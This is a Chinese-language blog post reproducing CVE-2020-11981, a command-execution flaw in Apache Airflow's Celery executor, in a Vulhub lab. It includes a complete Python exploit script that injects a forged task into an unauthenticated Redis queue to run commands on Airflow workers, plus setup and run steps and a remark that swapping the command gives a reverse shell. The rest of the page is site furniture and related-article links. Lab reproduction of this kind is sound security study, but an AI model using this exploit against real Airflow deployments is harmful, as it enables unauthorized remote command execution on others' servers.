Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)

已于 2024-05-21 11:17:27 修改
阅读量257 收藏 5
点赞数 5
分类专栏: vulhub复现学习合集 文章标签: apache
于 2024-05-21 11:17:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139087191
版权

影响版本

<1.10.11

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。

复现

docker-compose run airflow-init

docker-compose up -d

启动环境

利用这个漏洞需要控制消息中间件,Vulhub环境中Redis存在未授权访问。通过未授权访问,攻击者可以下发自带的任务`airflow.executors.celery_executor.execute_command`来执行任意命令,参数为命令执行中所需要的数组。

我们可以使用[exploit_airflow_celery.py](exploit_airflow_celery.py)这个小脚本来执行命令touch /tmp/airflow_celery_success

exploit_airflow_celery.py:

import pickle
import json
import base64
import redis
import sys
r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) 
queue_name = 'default'
ori_str="{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \"W1sxMDAsIDIwMF0sIHt9LCB7ImNoYWluIjogbnVsbCwgImNob3JkIjogbnVsbCwgImVycmJhY2tzIjogbnVsbCwgImNhbGxiYWNrcyI6IG51bGx9XQ==\"}"
task_dict = json.loads(ori_str)
command = ['touch', '/tmp/airflow_celery_success']
body=[[command], {}, {"chain": None, "chord": None, "errbacks": None, "callbacks": None}]
task_dict['body']=base64.b64encode(json.dumps(body).encode()).decode()
print(task_dict)
r.lpush(queue_name,json.dumps(task_dict))

pip install redis

python exploit_airflow_celery.py [靶机ip]

可以看到

执行成功会创建一个这样的文件

docker-compose exec airflow-worker ls -l /tmp

可以看到执行成功

如果要反弹shell把py中的command指令修改即可

shierbai
关注
  • 5
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981
qq_51577576的博客
12-18 553
[ vulhub漏洞复现篇 ] Apache Airflow Celery 消息中间件命令执行漏洞复现 CVE-2020-11981 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具, 不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力,并且提供了钩子(hook)使其拥有很好地扩展性。除了一个命令行界面,该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令
Celery Redis未授权访问命令执行利用
fnmsd的博客
07-10 7156
Celery在队列中间件未授权的情况下命令执行的利用。
vulhub中 Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981
yougexiaojiuguan的博客
02-03 242
漏洞复现过程中的记录,方便自己以后查看。
Apache Airflow Celery 消息中间件命令执行漏洞复现(CVE-2020-11981
Tauil的博客
08-14 1739
利用AirflowCeleryExecutor类来进行命令执行,可利用版本小于1.10.10。到airflowcelery redis队列。写入一个JSON任务消息执行。然后另起一个终端,输入。,回到原终端执行命令。,即可连接到目标靶机。...
【vulhub】Celery 漏洞 Redis未授权访问命令执行利用
qq_45300786的博客
09-13 788
这个exp楼主目前还不会改,所以只能执行touch /tmp/celery_success 等哪天楼主把python的pickle的序列化研究会了,再来更新其他命令。 参考: https://blog.csdn.net/fnmsd/article/details/118575254
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用
qq_51577576的博客
10-04 1633
[ vulhub漏洞复现篇 ] Celery <4.0 Redis未授权访问+Pickle反序列化利用 Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递,当所用队列服务(比如Redis、RabbitMQ、RocketMQ等等等)存在未授权访问问题时,可利用Pickle反序列化漏洞执行任意代码。这里我们使用redis的队列服务
Python库 | apache-airflow-providers-apache-spark-2.1.3.tar.gz
04-06
资源分类:Python库 所属语言:Python 资源全名:apache-airflow-providers-apache-spark-2.1.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
dag-factory:从YAML配置文件动态生成Apache Airflow DAG
05-13
它需要Python 3.6.0+和Apache Airflow 1.10+。 用法 在Airflow环境中安装dag-factory之后,有两个步骤来创建DAG。 首先,我们需要创建一个YAML配置文件。 例如: example_dag1 : default_args : owner : ' ...
airflow-code-editor:Apache Airflow的插件,可让您在浏览器中编辑DAG
04-27
气流代码编辑器插件 ... git_cmd git命令(可选路径) git_default_args git参数添加到每个调用中(默认值:-c color.ui = true) git_author_name作者/提交者中易于理解的名称(默认记录的用户的名字和姓
airflow-client-go:Apache Airflow-Go的OpenApi客户端
05-17
"github.com/apache/airflow-client-go/airflow" ) func main () { cli := airflow . NewAPIClient ( & airflow. Configuration { Scheme : "http" , Host : "localhost:8080" , BasePath : "/api/v1" , })...
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
weixin_44047654的博客
11-28 1020
Apache Airflow Celery 消息中间件命令执行(CVE-2020-11981)
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 1444
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123。
Apache Doris】周FAQ集锦:第 5 期
ith321的博客
06-09 1043
Apache Doris】周FAQ集锦:第 5 期
Apache Flink 如何保证 Exactly-Once 语义
06-12 658
Apache Flink 通过状态一致性检查点和 Two-Phase Commit 协议来确保 Exactly-Once 语义。这些机制确保了数据在分布式系统中的一致性和准确性,从而提高了大数据处理的可靠性和准确性。在实际应用中,我们可以根据具体需求配置 Flink 的检查点策略和外部存储系统的写入策略,以实现更好的性能和可靠性。
在Ubuntu20.04上安装Apache、MySQL和PHP的基本步骤
m0_64335844的博客
06-11 165
在浏览器中访问DVWA,通常是 http://localhost/dvwa/setup.php ,按照提示进行安装。然后访问 http://localhost/info.php 查看PHP信息页面。然后将index.php移到列表的开头,保存并退出。
Apache Doris 基础 -- 部分数据类型及操作
最新发布
chinusyan的专栏
06-13 365
Apache Doris 基础 -- 部分数据类型及操作
Apache Pulsar 从入门到精通
weixin_38687619的博客
06-10 428
具有非常灵活的消息模型和直观的客户端 API。分布式发布-订阅消息平台。多租户、认证、授权、配额。Pulsar 是一个。
Apache HttpClient总览
诗人不写诗
06-12 782
Apache HttpClient 4.x 系列• HttpClient 4.0(发布于2008年左右):这是一个重要的里程碑,标志着HttpClient从Jakarta Commons项目转移到Apache HttpComponents项目。4.0版进行了大量的重构,引入了新的连接管理模型(基于HttpCore),支持了HTTP/1.1的持久连接、连接池以及更灵活的配置选项。
CVE-2020-11978
08-10
回答:CVE-2020-11978是Apache Airflow中的一个命令注入漏洞。根据引用中提到的博文,漏洞可以通过复现来进行验证。要进行复现,可以使用vulhub靶场中的CVE-2020-11978文件夹,并按照指示输入相关命令启动docker-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值